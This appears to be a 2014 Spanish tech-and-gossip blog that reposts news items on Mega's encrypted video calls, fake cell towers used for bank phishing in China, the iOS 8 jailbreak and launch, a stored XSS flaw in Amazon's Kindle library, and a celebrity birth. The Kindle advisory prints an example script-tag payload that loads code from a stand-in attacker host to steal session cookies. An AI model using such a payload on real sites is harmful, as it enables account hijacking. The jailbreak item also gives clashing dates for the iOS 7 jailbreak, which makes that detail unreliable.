Fue durante el evento "Moment of Truth" donde Kim Dotcom dijo que tiene listo un servicio de videoconferencias cifradas, el cual sería comparable con Skype en cuanto a funcionalidades, sin embargo, traería como mayor virtud asegurar la privacidad de sus usuarios. El servicio llegaría como un complemento para Mega, y sería utilizado desde la web. 

Kim Dotcom organizó el evento Moment of Truth con el objetivo de discutir asuntos sobre vigilancia y privacidad. Minutos después de que había platicado con algunos defensores de la privacidad les permitió a Edward Snowden y Julian Assange unirse por medio de una videoconferencia, en la que utilizaron este prometedor servicio cifrado. 

Por ahora no hay datos concretos de cuando llegarían las videoconferencias cifradas a Mega, no obstante, nos queda claro que, siendo utilizado para proteger a dos figuras como Edward Snowden y Julian Assange, podría estar en una fase final de su desarrollo. 

Fuente: Genbeta

jueves, 18 de septiembre de 2014

¿el próximo gran objetivo de los hackers?

En los próximos meses podríamos asistir a un nuevo fenómeno a nivel mundial que ya ha comenzado a darse con mucha frecuencia en China. Nos referimos a la nueva forma que han encontrado los ciberdelincuentes de obtener datos e información privada de los usuarios de telefonía móvil. En lugar de esperar que el usuario descargue en su dispositivo algún tipo de aplicación en la que se escondan piezas de código malicioso con el objetivo por ejemplo de tener acceso a nuestras credenciales de banca online, los usuarios se verían visto afectados por una nueva práctica que consiste en piratear directamente la señal de las antenas de telefonía móvil.



Foro de telefonía móvil.

China está sufriendo considerablemente el azote de esta nueva actividad delictiva. Los piratas informáticos harían uso de la falsa señal emitida por un repetidor situado en zonas pobladas, al que el dispositivo móvil se conectaría, dejando un canal abierto para que los atacantes pudieran tener acceso a llevar a cabo acciones de phising o introducir virus. En concreto, muchos usuarios han estado recibiendo falsos mensajes de texto que supuestamente eran enviados por sus entidades bancarias. En ellos se hacía mención acerca de una recompensa acumulada a través de su tarjeta de crédito que podría ser canjeada por dinero en efectivo. En dicho mensaje se incluía un enlace en el cual al acceder a él introduciendo las credenciales bancarias pero que posteriormente no permitía acceder a ningún otro sitio web. Horas más tarde, el usuario que comprobara la actividad de su cuenta bancaria, podía observar cómo habían sido retiradas cantidades que podían llegar a los 500 euros.

hackers

Lo realmente peligroso de este nuevo tipo de ataque es que el mensaje recibido en el terminal móvil era enviado desde el número de atención al cliente de la entidad bancaria, pero gracias a que se hacía a través de una señal pirateada, los hackers podían tener acceso a manipular detalles de esa comunicación para enmascarar el fraude. Según la firma de seguridad china Qihoo 360, en solo 3 meses se han detectado 1.200 millones de mensajes fraudulentos de los que una buena parte han logrado hacerse con su objetivo.

El coste de instalar una falsa antena es menor a 600 euros

El coste de instalar una antena de este tipo no supera los 550 euros y sin embargo el beneficio ilícito que puede reportar puede ser mucho mayor. Muchas empresas utilizan estos medios para enviar mensajes promocionales de forma masiva, saltándose las restricciones vigentes en las leyes de cada territorio. Aunque según Qihoo, otra finalidad detectada es la promoción de actividades ilegales. Aunque el fenómeno de momento solo ha alcanzado un gran calado el país asiático, este tipo de falsas antenas de telefonía, comienza a expandirse en todo el mundo. En Washington se ha comenzado a detectar una presencia inusual de las mismas y en Europa también han comenzado a darse casos.

Fuente: The Verge

Hackers ya trabajan en el Jailbreak de iOS 8

Apple publicó ayer por la tarde iOS 8, la última versión de su sistema operativo móvil para iPhone, iPad y iPod Touch. La mayoría de usuarios actualizó sin pensárselo dos veces, pero muchos  aficionados al Jailbreak han preferido no hacerlo para así poder conservar todas sus aplicaciones de Cydia. Como siempre sucede en estos casos, la nueva versión no es compatible con el último Jailbreak y por tanto si actualizamos lo perdemos. El Jailbreak más reciente fue publicado por el grupo de hackers Pangu Team y es compatible con dispositivos que estén actualizados como mucho a la versión iOS 7.1.2, a partir de ahí ya no hay soporte. Si te interesa tener el Jailbreak en tu equipo con iOS 8 hay buenas noticias, y es que los hackers ya han confirmado que hay posibilidades y ya están trabajando en el futuro Jailbreak de iOS 8.



El Pangu Team ya ha confirmado que ha empezado a trabajar en el Jailbreak de iOS 8, aunque hay que tener en cuenta que no es ninguna garantía de que vaya a llegar pronto. Si nos fijamos en el año pasado, el Jailbreak de iOS 7 no fue lanzado hasta final de año, concretamente el 27 de septiembre, lo que suma más de tres meses de espera. Sin embargo puede darse el caso de que lo consigan mucho más rápido, aunque lo mejor es tener paciencia e ir viendo sus progresos. Por el momento no han dado detalles acerca de sus descubrimientos, sólo se han limitado a decir que han empezado a buscar posibles exploits.

jailbreak

Por otro lado Musclenerd, conocido líder del extinto iPhone Dev-Team, también aprovechó la ocasión para advertir a sus seguidores de Twitter que instalar iOS 8 hace que perdamos el Jailbreak si lo teníamos instalado. Además también indica que no es posible aplicar un downgrade, es decir, volver a la versión anterior. El único dispositivo que tiene opción de volver a iOS 7.1.2 es el iPad 2, pero sólo si se han almacenado los SHSH Blobs anteriormente. El conocido hacker americano también habló sobre el Jailbreak de iOS 8, que a priori parece complicado, pero asegura que “siempre se encuentran más agujeros de seguridad”. Es una cuestión de tiempo, pero depende del nivel de esfuerzo que se le dedique. Los responsables del último Jailbreak fueron el PanGu Team, pero también están los Eva3rs, grupo del que el propio Musclenerd forma parte junto a Pod2g, Planetbeing y Pimskeks.

Apple sigue incorporando novedades en su plataforma que se parecen a funciones de Jailbreak. En iOS 8 han abierto ciertos apartados del sistema, como los teclados, el sensor de huellas, los widgets para el Centro de Notificaciones o Healthkit. Ahora podremos descargar todos estos elementos desde la App Store, cuando hasta hace apenas unas horas sólo teníamos la opción de hacerlo con el Jailbreak. El Jailbreak puede haber perdido el interés de otros años, pero eso no significa que vaya a desaparecer, siempre hay algo que mejorar o arreglar.

Fuente: Amparo Babiloni

iOS 8: Revoluciona al Mundo

La aventura inicia este miércoles 17 del iOS 8 ha revolucionado a los usuarios de Apple, a pesar de que no incorpora grandes novedades, a parte de menús renovados, la actualización se centra en mejorar y optimizar aspectos del iOS 7. La compañía de Cupertino lo tenía claro cuando anunció la actualización de su sistema operativo: «Nunca iOS había sido tan grande», y así se lo ha demostrado los fans de la manzana mordida, que han convertido a la nueva versión de software en trending topic mundial antes, durante y después del lanzamiento.


Siguiendo el ejemplo de sus predecesores, el iOS 8 estaba disponible para descargar desde minutos antes de las 19 horas (hora peninsular). A partir de ese instante se ha abierto la veda de problemas y errores, de los que Twitter se ha hecho eco. En esta ocasión, no solo ha sido el tiempo de espera y las horas de descargar las que se han llevado las principales quejas.

El fracaso del HealthKit

La aplicación médica Health, el médico en el bolsillo, era una de las grandes novedades del iOS 8 -junto al HomeKit, una herramienta para integrar dispositivos inteligentes del hogar- y se ha desinflado en las primeras horas de vida. La alarma saltó entre los usuarios cuando la aplicaciones desaparecía de la app Store. Ante la sorpresa inicial, Apple ha tenido que salir al paso de los rumores y ha confirmado a Financial Times, y que recoge Computer Hoy, que ha habido un error con las herramientas de HealthKit que buscan la información de los ejercicios que realiza el dueño y de su estado de salud. Aunque se trata de un error menor y que se arreglará de forma rápida, habrá que esperar hasta finales del mes de septiembre para poder descargarla.

Los 5,7 gigas libre de memoria

Una vez pasado la barrera de la compatibilidad, la sorpresa llega cuando el usuario de Apple se planta ante la notificación de que el iOS 8 ya está disponible para descargar. Aunque las especificaciones del nuevo software hablaban de una necesidad de un 1 giga libre de memoria -el sitio real que ocupa la actualización una vez descargado e instalado-, en realidad se necesitan 5,7 gigas libres, aunque cuantos más espacio mejor -sobre todo en los dispositivos más antiguos-. Esta necesidad pone en aprieto a los dueños de modelos con 8GB o 16GB ya que implica que muchos usuarios tendrán que deshacerse de parte de sus aplicaciones.

Las posibilidades son dos. Por una parte, hacer una copia de música, vídeos o fotos en la iCloud o en cualquier otra nube para así evitar perder muchos más cambios. O, la otra vía es descargarlo en iTunes para PC o MAC, donde el iOS 8 solo necesita 1,92 gigas de espacio libre.

Las compatibilidades

Los usuarios de las versiones anteriores del iPhone 4S y del iPad2 -a pesar de que entraba dentro de las quinielas de quedarse atrás- ya lo sabían: sus dispositivos se quedarían estancados en el iOS8. La compañía californiana restringía la actualización al iPhone 4S, iPhone 5, iPhone 5S y 5C, iPad 2, iPad Retina, iPad Air, iPad mini, iPad mini Retina y iPod Touch (de quinta generación). Sin olvidarse de que los nuevos iPhones 6 llegarán al mercado ya con el nuevo software instalado. Sin embargo, eso no ha librado a Apple a la hora de la verdad de llevarse otra ración de criticas por olvidarse de ellos. Sobre todo de los que tuiteaban desde un iPhone 4, aunque se veía venir después de que recibieran el iOS 5, el iOS 6 y el iOS 7.

Sin embargo, aunque en el momento inicial los dueños de un iPhone 4S y del iPad 2 respiraron aliviados por seguir en el camino de las actualizaciones, parece que no todo iba a ser fiesta para ellos. Muchas publicaciones, como Gizmodo, empezaban el miércoles a alertar de que quizás no sería recomendable instalar el iOS 8 en estos dispositivos, sobre todo en el smartphone ya que el software es demasiado pesado para su procesador ?que solo tiene una cuarta parte de la potencia del 5S-.

Así, según estos informes, las aplicaciones del iPhone 4S tardarían hasta un segundo más que en iOS 7. Además, cabe recordar que esta versión del móvil de Apple no tiene soporte para Air Drop, Touch ID, Handoff o Open GL 3.0., por lo que sus usuarios no podrán aprovecharse de todas las ventajas que incluye el iOS 8.

Fuente: Galicia

Vulnerabilidad en Kindle permite obtener detalles de la cuenta de usuario

Se ha anunciado una vulnerabilidad en el software del Kindle de Amazon que podría permitir a un atacante acceder a todos los detalles de una cuenta de Amazon.


El problema reside en un cross-site scripting almacenado, la más peligrosa de todas las formas de este tipo de ataques, en la librería Kindle de Amazon, en las páginas conocidas como "Manage Your Content and Devices" y "Manage your Kindle". El fallo se produce al descargar un libro electrónico desde un sitio que no sea la propia web de Amazon, y podría permitir inyectar código malicioso a través de los metadatos del libro (por ejemplo el título).

El atacante podrá crear un libro con un título como [script src="https://www.atacante.org/script.js"][/script].
Una vez que la víctima descargue el libro y lo tenga añadido a su librería, el código se ejecutara en el momento en que la víctima abra la página web de la librería del Kindle. Como resultado, el atacante podrá acceder y transferir las cookies de sesión de Amazón, por lo que la cuenta quedará comprometida. Existe disponible una prueba de concepto del problema.

Lo más sorprendente es que según Benjamin Daniel Mussler, investigador que ha dado a conocer el problema, reportó el problema a Amazon en noviembre de 2013 y fue corregido poco después. Sin embargo confirma que, hace dos meses, al publicar una nueva versión de la aplicación web "Manage your Kindle" se ha reintroducido la vulnerabilidad. Según confirma no ha obtenido respuesta a ninguna de sus comunicaciones.

Fuente: Hispasec

miércoles, 17 de septiembre de 2014

Eva Mendes fue mamá a los 40 años

Eva Mendes dio a luz a su hija con Ryan Gosling el pasado 12 de septiembre, en el más absoluto secreto. La noticia se filtró recién unos días después cuando lo confirmó la revista Us Weekley.

La actriz, de 40 años, nunca habló de su embarazo, pero en julio salió a la luz que ella estaba en la dulce espera y de siete meses. Acudió a pocos eventos y las pocas veces que se mostró en público utilizó prendas grandes y que lograban ocultar la pancita.



Por el momento, los actores no revelaron el nombre de su hija y es probable que no lo hagan ya que desde el primer momento guardaron todo para su intimidad.

La relación entre los exitosos astistas de Hollywood comenzó en 2011 durante el rodaje de una película, mientras que su primera salida pública fue en un viaje a Disneyland, en California.

Los actores no tienen planes de casamiento por ahora porque él no estaría interesado en pasar por el altar. "Ryan creció sin papá. Entonces siempre dijo que cuando creciera su hijo, él estaría presente pase lo que pase. Ryan piensa que no tienen que casarse porque vayan a tener un hijo, pero a Eva sí le parece dar importante dar ese paso", comentó un amigo del actor. Mientras que una amiga de la actriz opinó que "Eva encontró en Ryan al hombre perfecto para formar una familia".

Fuente: InfoBae